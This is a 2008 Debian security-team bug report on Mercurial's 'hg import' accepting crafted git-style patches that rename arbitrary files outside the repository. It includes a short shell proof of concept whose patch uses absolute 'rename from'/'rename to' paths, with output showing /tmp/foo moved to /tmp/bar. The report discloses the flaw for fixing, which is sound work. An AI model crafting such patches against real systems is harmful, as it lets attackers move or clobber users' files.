[Secure-testing-team] Bug#488628: mercurial: Insufficient input validation
Steffen Joeris
steffen.joeris at skolelinux.de
Mon Jun 30 07:42:05 UTC 2008
Package: mercurial
Severity: grave
Tags: security, patch
Justification: user security hole
Hi
It is possible to rename arbitrary files, even outside
the repository by using a maliciously crafted patch.
Proof of concept:
echo quux > /tmp/foo
cat /tmp/foo /tmp/bar
quux
cat: /tmp/bar: No such file or directory
hg init hg-sandbox; cd hg-sandbox
hg import - <<EOF
> diff --git a/a b/b
> rename from /tmp/foo
> rename to /tmp/bar
> EOF
applying patch from stdin
/tmp/foo not tracked!
abort: /tmp/bar not under root
cat /tmp/foo /tmp/bar
cat: /tmp/foo: No such file or directory
quux
The issue has been fixed upstream[0].
Please upload with high urgency to make sure the fix reaches testing
soon.
Cheers
Steffen
[0]: http://www.selenic.com/hg/rev/87c704ac92d4
More information about the Secure-testing-team
mailing list